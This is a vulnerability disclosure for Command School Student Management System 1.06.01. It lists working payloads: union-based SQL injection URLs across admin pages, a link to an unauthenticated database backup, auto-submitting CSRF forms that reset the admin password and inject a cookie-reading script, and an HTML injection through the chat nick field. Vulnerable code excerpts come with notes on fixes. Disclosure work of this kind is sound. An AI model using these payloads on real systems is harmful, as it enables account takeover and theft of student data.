Command School Student Management System V1.06.01 - Multiple Vulnerabilities
============================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/swifttide/
####################################################################

I. Multiple Sql Injection

##############
VULNERABILITY
##############

/admin_school_names.php
-----------------------------------------------------------------------------
line (27): $action=get_param("action");
line (54-56)
case "edit":
$school_names_id=get_param("id");
$sSQL="SELECT school_names_desc FROM school_names WHERE school_names_id=$school_names_id";
note: [all the files listed below share the same flaw: the id parameter is read with get_param() and interpolated into the query unquoted and unvalidated. Casting it to an integer before use, or binding it as a parameter of a prepared statement, removes the injection.]
-----------------------------------------------------------------------------
#########
EXPLOIT
#########
localhost/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
localhost/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()

II.
Backup Download

##############
VULNERABILITY
##############

/Backup/backup_ray2.php (LINE: 78-126)
-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");
// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res)) { $tables[] = $s[0]; }
// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table) {
// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");
// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]);
// FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");
// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data)) {
// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++) { $txt .= "'".mysql_real_escape_string($row[$i])."', "; }
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------
note: [the excerpt dumps every table, schema and rows, into a file whose name is built only from the date, time and database name, opened by a relative path (so it is written wherever the script runs from, typically its own directory), and nothing in lines 78-126 checks that the requester is authenticated or authorized. Lines 1-77 are not shown, so confirm whether such a check exists earlier in the file; if it does not, the dump can be produced by any visitor. Requiring an authenticated admin session before this block and writing the dump outside the web root are the expected fixes.]
#####################################################
EXPLOIT
#####################################################
<html>
<title>Iphobos Blog</title>
<label><a href="http://localhost/sw/backup/backup_ray2.php" class="button white">Backup Download</a></label>
</html>

III.
Cross Site Request Forgery [Change Password Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action=" http://localhost/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>

note: [the forged request carries only the password and action fields; it succeeds because, as reported here, the handler requires neither a per-request anti-CSRF token nor the current password. A random per-session token validated on every state-changing POST, plus confirmation of the current password, is the standard fix.]

IV. Cross Site Scripting [CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/sw/add_topic.php">
<input type="hidden" name="topic" value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>

note: [this combines the missing CSRF protection with a stored XSS: according to the report, the topic value is saved and later rendered without encoding. Escaping topic and detail with htmlspecialchars() on output, together with the CSRF token, addresses both.]

V. Html File Injection

##############
VULNERABILITY
##############

/chat/message.php (LINE: 4-12)
-----------------------------------------------------------------------------
$f = fopen('msg.html',"a+");
} else {
$f = fopen('msg.html',"w+");
}
$nick = isset($_GET['nick']) ? $_GET['nick'] : "Hidden";
$msg = isset($_GET['msg']) ? htmlspecialchars($_GET['msg']) : ".";
$line = "<p><span class=\"name\">$nick: </span><span class=\"txt\">$msg</span></p>";
fwrite($f,$line."\r\n");
fclose($f);
-----------------------------------------------------------------------------
note: [the excerpt begins inside an if/else whose condition is above line 4. $msg is passed through htmlspecialchars() but $nick is written into msg.html raw, so the nick parameter is the injection point; applying htmlspecialchars() to $nick as well closes it.]
#########
EXPLOIT
#########
localhost/sw/chat/message.php?line=&nick=IPHOBOS&msg=BLOG
After the request, open localhost/sw/chat/msg.html; the injected content is rendered there.
####################################################################